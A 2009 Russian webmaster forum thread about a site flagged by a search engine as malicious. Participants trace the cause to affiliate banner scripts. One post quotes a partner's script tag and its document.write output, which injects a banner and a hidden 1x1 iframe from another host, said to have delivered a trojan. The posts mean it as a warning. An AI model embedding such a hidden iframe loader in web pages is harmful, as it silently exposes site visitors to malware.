webturist 6 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Но Вы же писали, что он на всех страницах, даже в админке - где рекламы нет? Если бы он там не был, можно было бы подумать о рекламных блоках, но тут тоже такое дело, что рекламодатель должен проверять свои ссылки, если конечно он хочет сотрудничать и зарабатывать. Если это система типа "тизерной", в которую все могут добавить свою рекламу - тоже самое, должны проверять. Не ботнет же Вам рекламу дает... Попробуйте написать в поисковик, если угрозы нет - включить должны, или же показать конкретную причину блокировки. Написал конечно! Сразу как всё проверил... Итог такой же, как если б ы не писал. Ничего естественно не включили и не ответили на письмо... Мало того, робот через неделю прошел и обновил дату "что этот сайт атакует компьютеры" на новую дату "27.07". Теперь опять неделю ждать. Попробую отключить все партнерские скрипты. Всем обсуждающим то, что это произошло из-за взлома чего либо непосредственно на моем компе отвечу: Все эти доводы обоснованы и имеют "зерно". Можно об этом говорить сколь угодно, но все это произошло не по этой причине. Я не самоуверен и не отрицаю, что так может быть, но причина не в этом... Некоторые более "сильные" и проф. порталы, на данный момент имеют ту же проблему. Не думаю, что из-за того, что кто-то взломал или запустил троян непосредственно на комп. П.С. Увы, от темы мы уже отклонились на обсуждение какая ОС лучше dedugan, партнеры..... Сегодня захожу на один из своих сайтов, защита блокирует iFrame. Не с FreeBSD или Мака, но заи****ся локти грызть. Смотрю код - чисто. В общем кончилось это дело удалением одного партнера. Сука. Извиняюсь. Не люблю таких людей. Написал бы код, да в сердцах удалил и забыл скопировать. С безобидной партнерской ссылки подгружался. У Вас может быть такая же беда. Сила и профессионализм в знаниях. Если у упомянутых Вами порталов данные проблемы имеют место быть, то эти критерии им не подходят. Пишу о событиях получасовой давности. Цитата Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 29 июля 2009 Рассказать Опубликовано: 29 июля 2009 Потому что создатели маков очень наглые люди, они взяли чужое ядро переписали его под себя. Ты "Силиконовая долина" смотрел? Все всё у глупенького КСЕРОКСа скомуниздили. А потом на протяжении многих лет друг у друга воровали. А потом появился Рыцарь в зелёных доспехах и ни у кого ничего не воруя создал ФрииБСД ты в это веришь? Воровали воруют и будут воровать все и у всех. Честные они хоть и бывают но всё равно нет нет а где нибудь чтонибудь и скомуниздят что плохо лежит Цитата Ссылка на сообщение Поделиться на других сайтах
КиберБулка 2 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 (изменено) Ты "Силиконовая долина" смотрел? Все всё у глупенького КСЕРОКСа скомуниздили. А потом на протяжении многих лет друг у друга воровали. Смотрел, даже был там, да и щас мне 20 минут на машине до туда. А потом появился Рыцарь в зелёных доспехах и ни у кого ничего не воруя создал ФрииБСД ты в это веришь? Воровали воруют и будут воровать все и у всех. Честные они хоть и бывают но всё равно нет нет а где нибудь чтонибудь и скомуниздят что плохо лежит Естесно камуниздели, такие вещи как OpenSSH взяли из проекта OpenBSD и другие, это да, но чтобы целиком ядро. Зы: Вот скажи мне, только честно, ты сам когда нить работал на маках ? Работал я не имею в виду видел, а именно работал и чтото делал ? Изменено 30 июля 2009 пользователем КиберБулка Цитата Ссылка на сообщение Поделиться на других сайтах
dedugan 0 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 (изменено) webturist dedugan, партнеры..... Сегодня захожу на один из своих сайтов, защита блокирует iFrame. Не с FreeBSD или Мака, но заи****ся локти грызть. Смотрю код - чисто. В общем кончилось это дело удалением одного партнера. Сука. Извиняюсь. Не люблю таких людей. Написал бы код, да в сердцах удалил и забыл скопировать. С безобидной партнерской ссылки подгружался. У Вас может быть такая же беда. Сила и профессионализм в знаниях. Если у упомянутых Вами порталов данные проблемы имеют место быть, то эти критерии им не подходят. Пишу о событиях получасовой давности. Жаль кода нет, интересно, может и у меня есть этот партнер... Спасибо, что поделились своей проблемой, думаю все таки это партнерские скрипты виноваты. В любом случае буду пробовать без них. Только вот без них, чем платить например за сервер ... Изменено 30 июля 2009 пользователем dedugan Цитата Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 Помойму lank.ru такой фигнёй страдает, что то вроде код банера тянется с сайта владельца банера. А соответственно он получает просторный такой мост на сайт партнёра. Ещё такие партнёрки частенько выходят из тех что открывают сайт под сайтом, типа попапа только не мешающего. Нужно просто смотреть что в код вставляете ... если это гугл адсенс то ясен пень там ничего быть не может а если вам втюхивают яву поставить подозрительные партнёрки то лучше 100 раз подумать и не поставить Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 (изменено) webturist dedugan, партнеры..... Сегодня захожу на один из своих сайтов, защита блокирует iFrame. Не с FreeBSD или Мака, но заи****ся локти грызть. Смотрю код - чисто. В общем кончилось это дело удалением одного партнера. Сука. Извиняюсь. Не люблю таких людей. Написал бы код, да в сердцах удалил и забыл скопировать. С безобидной партнерской ссылки подгружался. У Вас может быть такая же беда. Сила и профессионализм в знаниях. Если у упомянутых Вами порталов данные проблемы имеют место быть, то эти критерии им не подходят. Пишу о событиях получасовой давности. Жаль кода нет, интересно, может и у меня есть этот партнер... Спасибо, что поделились своей проблемой, думаю все таки это партнерские скрипты виноваты. В любом случае буду пробовать без них. Только вот без них, чем платить например за сервер ... dedugan, Осторожно. Опасность активна. Вот пример ссылки: <script type="text/javascript" src="http://www.photoplanet.ucoz.com/rtr/1-1"></script> Действие: document.write('<a title="Фото Мир" target="_blank" href="http://www.photoplanet.ucoz.com"><img border="0" src="http://www.photoplanet.ucoz.com/mybanners/banner.gif" width="88" height="31"></a><iframe src="http://www.placer.ucoz.ru/index/0-98" scrolling="no" width="1" frameborder="0" height="1"></iframe>'); Linkru.ru здесь опознан. ИскушениЕ прав. Причем товарищ этот пол года выдержал. Пославлен был из жалости, понравилось, то что он делал, хоть и на укозе. Изменено 30 июля 2009 пользователем webturist Цитата Ссылка на сообщение Поделиться на других сайтах
dedugan 0 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 (изменено) Ещё такие партнёрки частенько выходят из тех что открывают сайт под сайтом, типа попапа только не мешающего. Нужно просто смотреть что в код вставляете ... если это гугл адсенс то ясен пень там ничего быть не может а если вам втюхивают яву поставить подозрительные партнёрки то лучше 100 раз подумать и не поставить Именно такая у меня есть. Открывается под сайтом и там именно ява скрипт, в котором может быть все что угодно. Но вот только дело в том, что с этим сайтом я уже сотрудничаю уже пару лет точно и раньше ни каких проблем не было. Снял этот код, отправил запрос в Гугл на пересмотр. Жду результата.. webturist, Но ведь в коде нет ничего указывающего на Linkru.ru, да и в коде самом вроде ничего такого нет, разве что немного напрягает <iframe src="http://www.placer.ucoz.ru/index/0-98"... из-за того, что опять же не понятно что откроется по этому адресу в iframe Изменено 30 июля 2009 пользователем dedugan Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 webturist, Но ведь в коде нет ничего указывающего на Linkru.ru, да и в коде самом вроде ничего такого нет, разве что немного напрягает <iframe src="http://www.placer.ucoz.ru/index/0-98"... из-за того, что опять же не понятно что откроется по этому адресу в iframe dedugan, в коде нет, если защита хорошая можешь посмотреть в работе. Цитата Ссылка на сообщение Поделиться на других сайтах
dedugan 0 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 webturist, вставил скрипт в HTML главной страницы. Внизу появился анимированный банер 88х31. Потом проверил всю папку на вирусы. Сканировал "avast! Antivirus". В одном файле "backup\backup_katalog\index.htm" появился вирус... Но в этом случае его хотя бы можно было найти. В моем же я ничего не нашел... Цитата Ссылка на сообщение Поделиться на других сайтах
baxus 49 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 Один сайт показали он вывел сайт яндекса, а через обновление начинается реклама сайта с трояном, и вуаля на твоём сайте троян. Он не на твоём, он на сайте хацкера, а уже через всяческие партнёрки он свой сайт с трояном толкает по сети Цитата Ссылка на сообщение Поделиться на других сайтах
webturist 6 Опубликовано: 30 июля 2009 Рассказать Опубликовано: 30 июля 2009 (изменено) webturist, вставил скрипт в HTML главной страницы. Внизу появился анимированный банер 88х31. Потом проверил всю папку на вирусы. Сканировал "avast! Antivirus". В одном файле "backup\backup_katalog\index.htm" появился вирус... Но в этом случае его хотя бы можно было найти. В моем же я ничего не нашел... dedugan, внизу появляется баннер, который был у меня на сайте, как баннер партнера. Как раз через <script type="text/javascript" src="http://www.photoplanet.ucoz.com/rtr/1-1"></script> этот скрипт и подгружается троян. В данном случае он не на сайте, на котором есть этот баннер, а на другом сайте, с которого и подгружается. Значит Аваст его съел. Если у Вас бесплатная версия, попробуйте тот же Аваст, только Про который, он намного сильней обычного. Я думаю (могу конечно ошибаться), что Вы их просто не находите, из-за слабой защиты. От души рекомендую КИС поставить, не сочтите за рекламу. Месяц бесплатно - хватит найти и вычистить источник проблем, а там определитесь что к чему. Годами отсылаю всякое "Г" Касперскому, не очень часто новинки этого "Г" вылавливаю, но через несколько часов после обнаружения - противоядие уже в обновлении. Причем логический анализ в любом случае сообщит где и как у Вас это "Г" находится и чем занимается. Если установите и найти будет легче - просто удаляйте из кода Вашей страницы партнерские скрипты по одному (вырезайте с возможностью вставить обратно), и жмите F5 в браузере (обновить) после какого прекратятся "визги" - тот и забудьте навсегда. dedugan, я собираюсь переустановить одну из машин. Если Вас устраивает, скачайте и установите ТимВивер и дайте доступ к Вашему компьютеру. Постараюсь помочь на Ваших глазах. Заодно Вы все увидите, по ФТП входить будете сами. Жду ответа в личку с номером Icq. Предложение в силе несколько часов, потом физически не смогу. П.С. Бесплатно. Изменено 30 июля 2009 пользователем webturist Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.